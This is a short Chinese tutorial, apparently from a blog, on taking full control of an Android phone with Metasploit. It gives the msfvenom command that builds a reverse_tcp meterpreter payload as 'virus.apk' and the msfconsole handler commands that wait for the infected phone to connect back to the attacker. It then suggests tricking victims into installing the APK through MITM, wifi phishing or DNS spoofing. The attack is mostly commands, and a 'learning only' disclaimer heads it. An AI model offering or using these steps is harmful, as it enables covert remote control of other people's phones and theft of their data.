## 前言:本教程只作为学习用途,切勿用于其他用途。恶意入侵他人终端属于国家明令禁止的违法行为,请务必遵守!!!
## 什么是Payload? Payload是黑客用来与被入侵终端交互的简单脚本。Payload可以接收黑客发送的指令,并在被入侵电脑执行,从而达到获取用户敏感信息、乃至瘫痪被入侵电脑的目的。
## 运行环境:
### kali linux 2019.3
### Metasploit Framework
## 获得Android的完整权限
### 1. 通过Metasploit Framework (MSF) 中的msfvenom工具产生android的Payload:
msfvenom -p android/meterpreter/reverse_tcp LHOST=<你的ip> LPORT=4444 R > /root/Desktop/virus.apk
### 2. 打开MSF的控制台msfconsole,然后输入以下指令,等待目标终端安装Payload
msfconsole // 进入MSF控制台 use exploit/multi/handler // 采用handler模块 set payload android/meterpreter/reverse_tcp // 设置要用的Payload set LHOST <你的ip> set LPORT 4444 exploit // 等待目标终端
### 3. 诱骗目标终端下载含有Payload的apk
这里可以通过多种方式进行诱骗,如:中间人攻击(MITM)、wifi钓鱼、DNS欺骗等。我们以后会介绍到。这里我们直接用实验机进行实验。
结果如下:
## 实现效果展示(如果清晰度不够,请移步bilibili观看哦!)